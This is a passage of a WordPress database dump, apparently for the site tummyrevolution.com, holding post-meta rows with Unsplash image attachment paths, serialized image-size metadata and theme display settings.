_vertical_header_background_image_meta','no'),(14478,5489,'qodef_disable_header_widget_logo_area_meta','no'),(14479,5489,'qodef_disable_header_widget_menu_area_meta','no'),(14480,5489,'footnotes',''),(14483,5486,'footnotes',''),(14514,5506,'_edit_lock','1695131342:3'),(14515,5507,'_wp_attached_file','2023/09/christina-deravedisian-B9WSHFkjlb8-unsplash-scaled.jpg'),(14516,5507,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:62:\"2023/09/christina-deravedisian-B9WSHFkjlb8-unsplash-scaled.jpg\";s:8:\"filesize\";i:1079548;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"christina-deravedisian-B9WSHFkjlb8-unsplash-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11829;}s:5:\"large\";a:5:{s:4:\"file\";s:56:\"christina-deravedisian-B9WSHFkjlb8-unsplash-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121695;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"christina-deravedisian-B9WSHFkjlb8-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5927;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:55:\"christina-deravedisian-B9WSHFkjlb8-unsplash-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63272;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:57:\"christina-deravedisian-B9WSHFkjlb8-unsplash-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:326128;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:57:\"christina-deravedisian-B9WSHFkjlb8-unsplash-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:656353;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:55:\"christina-deravedisian-B9WSHFkjlb8-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51904;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:56:\"christina-deravedisian-B9WSHFkjlb8-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109569;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:56:\"christina-deravedisian-B9WSHFkjlb8-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134401;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:57:\"christina-deravedisian-B9WSHFkjlb8-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:263599;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:47:\"christina-deravedisian-B9WSHFkjlb8-unsplash.jpg\";}'),(14490,5502,'_wp_attached_file','2023/09/freestocks-nss2eRzQwgw-unsplash-scaled.jpg'),(14491,5502,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:50:\"2023/09/freestocks-nss2eRzQwgw-unsplash-scaled.jpg\";s:8:\"filesize\";i:275565;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:43:\"freestocks-nss2eRzQwgw-unsplash-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14307;}s:5:\"large\";a:5:{s:4:\"file\";s:44:\"freestocks-nss2eRzQwgw-unsplash-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71448;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:43:\"freestocks-nss2eRzQwgw-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7059;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:43:\"freestocks-nss2eRzQwgw-unsplash-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48424;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:45:\"freestocks-nss2eRzQwgw-unsplash-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125471;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:45:\"freestocks-nss2eRzQwgw-unsplash-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:193349;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:43:\"freestocks-nss2eRzQwgw-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36800;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:44:\"freestocks-nss2eRzQwgw-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64485;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:44:\"freestocks-nss2eRzQwgw-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49429;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:45:\"freestocks-nss2eRzQwgw-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95678;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:35:\"freestocks-nss2eRzQwgw-unsplash.jpg\";}'),(14497,5504,'_wp_attached_file','2023/09/mike-kenneally-d825JrXvun8-unsplash-scaled.jpg'),(14496,5503,'_edit_lock','1695133267:3'),(14498,5504,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1709;s:4:\"file\";s:54:\"2023/09/mike-kenneally-d825JrXvun8-unsplash-scaled.jpg\";s:8:\"filesize\";i:310848;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:47:\"mike-kenneally-d825JrXvun8-unsplash-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13621;}s:5:\"large\";a:5:{s:4:\"file\";s:48:\"mike-kenneally-d825JrXvun8-unsplash-1024x684.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80235;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"mike-kenneally-d825JrXvun8-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6660;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:47:\"mike-kenneally-d825JrXvun8-unsplash-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52737;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:49:\"mike-kenneally-d825JrXvun8-unsplash-1536x1025.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1025;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145279;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:49:\"mike-kenneally-d825JrXvun8-unsplash-2048x1367.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1367;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:222076;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:47:\"mike-kenneally-d825JrXvun8-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41633;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:48:\"mike-kenneally-d825JrXvun8-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77540;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:48:\"mike-kenneally-d825JrXvun8-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58824;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:49:\"mike-kenneally-d825JrXvun8-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113515;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:39:\"mike-kenneally-d825JrXvun8-unsplash.jpg\";}'),(14501,5503,'_thumbnail_id','5504'),(14502,5503,'_edit_last','3'),(14503,5503,'qodef_page_content_behind_header_meta','no'),(14504,5503,'qodef_boxed_background_image_attachment_meta','fixed'),(14505,5503,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/mike-kenneally-d825JrXvun8-unsplash-scaled.jpg'),(14506,5503,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14507,5503,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14508,5503,'qodef_video_type_meta','social_networks'),(14509,5503,'qodef_audio_type_meta','social_networks'),(14510,5503,'qodef_post_skin','qodef-post-light-skin'),(14511,5503,'qodef_disable_vertical_header_background_image_meta','no'),(14512,5503,'qodef_disable_header_widget_logo_area_meta','no'),(14513,5503,'qodef_disable_header_widget_menu_area_meta','no'),(14532,5509,'_edit_lock','1694672161:1'),(14519,5506,'_thumbnail_id','5507'),(14520,5506,'_edit_last','3'),(14521,5506,'qodef_page_content_behind_header_meta','no'),(14522,5506,'qodef_boxed_background_image_attachment_meta','fixed'),(14523,5506,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/christina-deravedisian-B9WSHFkjlb8-unsplash-scaled.jpg'),(14524,5506,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14525,5506,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14526,5506,'qodef_video_type_meta','social_networks'),(14527,5506,'qodef_audio_type_meta','social_networks'),(14528,5506,'qodef_post_skin','qodef-post-light-skin'),(14529,5506,'qodef_disable_vertical_header_background_image_meta','no'),(14530,5506,'qodef_disable_header_widget_logo_area_meta','no'),(14531,5506,'qodef_disable_header_widget_menu_area_meta','no'),(14533,5510,'_wp_attached_file','2023/09/khadeeja-yasser-FHT0KEOwtyg-unsplash-scaled.jpg'),(14534,5510,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1920;s:4:\"file\";s:55:\"2023/09/khadeeja-yasser-FHT0KEOwtyg-unsplash-scaled.jpg\";s:8:\"filesize\";i:981671;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"khadeeja-yasser-FHT0KEOwtyg-unsplash-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18554;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"khadeeja-yasser-FHT0KEOwtyg-unsplash-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:205179;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"khadeeja-yasser-FHT0KEOwtyg-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6292;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"khadeeja-yasser-FHT0KEOwtyg-unsplash-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119565;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:50:\"khadeeja-yasser-FHT0KEOwtyg-unsplash-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:419899;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:50:\"khadeeja-yasser-FHT0KEOwtyg-unsplash-2048x1536.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:683350;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:48:\"khadeeja-yasser-FHT0KEOwtyg-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84207;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:49:\"khadeeja-yasser-FHT0KEOwtyg-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:166338;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:49:\"khadeeja-yasser-FHT0KEOwtyg-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152551;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:50:\"khadeeja-yasser-FHT0KEOwtyg-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:297277;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:40:\"khadeeja-yasser-FHT0KEOwtyg-unsplash.jpg\";}'),(14555,5514,'_wp_attached_file','2023/09/jamie-street-vcn2ndJ5LwE-unsplash-scaled.jpg'),(14537,5509,'_thumbnail_id','5510'),(14538,5509,'_edit_last','1'),(14539,5509,'qodef_page_content_behind_header_meta','no'),(14540,5509,'qodef_boxed_background_image_attachment_meta','fixed'),(14541,5509,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/khadeeja-yasser-FHT0KEOwtyg-unsplash-scaled.jpg'),(14542,5509,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14543,5509,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14544,5509,'qodef_video_type_meta','social_networks'),(14545,5509,'qodef_audio_type_meta','social_networks'),(14546,5509,'qodef_post_skin','qodef-post-light-skin'),(14547,5509,'qodef_disable_vertical_header_background_image_meta','no'),(14548,5509,'qodef_disable_header_widget_logo_area_meta','no'),(14549,5509,'qodef_disable_header_widget_menu_area_meta','no'),(14554,5513,'_edit_lock','1696947829:3'),(14556,5514,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1795;s:4:\"file\";s:52:\"2023/09/jamie-street-vcn2ndJ5LwE-unsplash-scaled.jpg\";s:8:\"filesize\";i:348318;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"jamie-street-vcn2ndJ5LwE-unsplash-300x210.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10435;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"jamie-street-vcn2ndJ5LwE-unsplash-1024x718.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76435;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"jamie-street-vcn2ndJ5LwE-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4939;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"jamie-street-vcn2ndJ5LwE-unsplash-768x538.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:538;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47811;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"jamie-street-vcn2ndJ5LwE-unsplash-1536x1077.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1077;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148974;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:47:\"jamie-street-vcn2ndJ5LwE-unsplash-2048x1436.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1436;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:239093;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:45:\"jamie-street-vcn2ndJ5LwE-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38292;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:46:\"jamie-street-vcn2ndJ5LwE-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60030;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:46:\"jamie-street-vcn2ndJ5LwE-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55567;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:47:\"jamie-street-vcn2ndJ5LwE-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117135;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:37:\"jamie-street-vcn2ndJ5LwE-unsplash.jpg\";}'),(14572,5516,'_edit_lock','1696946471:3'),(14559,5513,'_thumbnail_id','5448'),(14560,5513,'_edit_last','3'),(14561,5513,'qodef_page_content_behind_header_meta','no'),(14562,5513,'qodef_boxed_background_image_attachment_meta','fixed'),(14563,5513,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/diana-polekhina-v0ZjnfxnP60-unsplash-scaled.jpg'),(14564,5513,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14565,5513,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14566,5513,'qodef_video_type_meta','social_networks'),(14567,5513,'qodef_audio_type_meta','social_networks'),(14568,5513,'qodef_post_skin','qodef-post-light-skin'),(14569,5513,'qodef_disable_vertical_header_background_image_meta','no'),(14570,5513,'qodef_disable_header_widget_logo_area_meta','no'),(14571,5513,'qodef_disable_header_widget_menu_area_meta','no'),(14573,5517,'_wp_attached_file','2023/09/vicky-ng-uy_V12d-VXU-unsplash-scaled.jpg'),(14574,5517,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1920;s:4:\"file\";s:48:\"2023/09/vicky-ng-uy_V12d-VXU-unsplash-scaled.jpg\";s:8:\"filesize\";i:921979;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"vicky-ng-uy_V12d-VXU-unsplash-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19215;}s:5:\"large\";a:5:{s:4:\"file\";s:42:\"vicky-ng-uy_V12d-VXU-unsplash-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155018;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"vicky-ng-uy_V12d-VXU-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8408;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"vicky-ng-uy_V12d-VXU-unsplash-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93871;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:43:\"vicky-ng-uy_V12d-VXU-unsplash-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:341675;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:43:\"vicky-ng-uy_V12d-VXU-unsplash-2048x1536.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:588303;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:41:\"vicky-ng-uy_V12d-VXU-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69813;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:42:\"vicky-ng-uy_V12d-VXU-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124112;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:42:\"vicky-ng-uy_V12d-VXU-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126754;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:43:\"vicky-ng-uy_V12d-VXU-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:243133;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:33:\"vicky-ng-uy_V12d-VXU-unsplash.jpg\";}'),(14590,5519,'_edit_lock','1696926530:3'),(14577,5516,'_thumbnail_id','5517'),(14578,5516,'_edit_last','3'),(14579,5516,'qodef_page_content_behind_header_meta','no'),(14580,5516,'qodef_boxed_background_image_attachment_meta','fixed'),(14581,5516,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/vicky-ng-uy_V12d-VXU-unsplash-scaled.jpg'),(14582,5516,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14583,5516,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14584,5516,'qodef_video_type_meta','social_networks'),(14585,5516,'qodef_audio_type_meta','social_networks'),(14586,5516,'qodef_post_skin','qodef-post-light-skin'),(14587,5516,'qodef_disable_vertical_header_background_image_meta','no'),(14588,5516,'qodef_disable_header_widget_logo_area_meta','no'),(14589,5516,'qodef_disable_header_widget_menu_area_meta','no'),(14591,5520,'_wp_attached_file','2023/09/emma-simpson-mNGaaLeWEp0-unsplash-scaled.jpg'),(14592,5520,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:52:\"2023/09/emma-simpson-mNGaaLeWEp0-unsplash-scaled.jpg\";s:8:\"filesize\";i:662253;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"emma-simpson-mNGaaLeWEp0-unsplash-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16586;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"emma-simpson-mNGaaLeWEp0-unsplash-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148340;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"emma-simpson-mNGaaLeWEp0-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7406;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"emma-simpson-mNGaaLeWEp0-unsplash-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89519;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:47:\"emma-simpson-mNGaaLeWEp0-unsplash-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:291343;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:47:\"emma-simpson-mNGaaLeWEp0-unsplash-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:466213;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:45:\"emma-simpson-mNGaaLeWEp0-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74669;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:46:\"emma-simpson-mNGaaLeWEp0-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118045;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:46:\"emma-simpson-mNGaaLeWEp0-unsplash-550x1100.jpg\";s:5:\"width\";i:55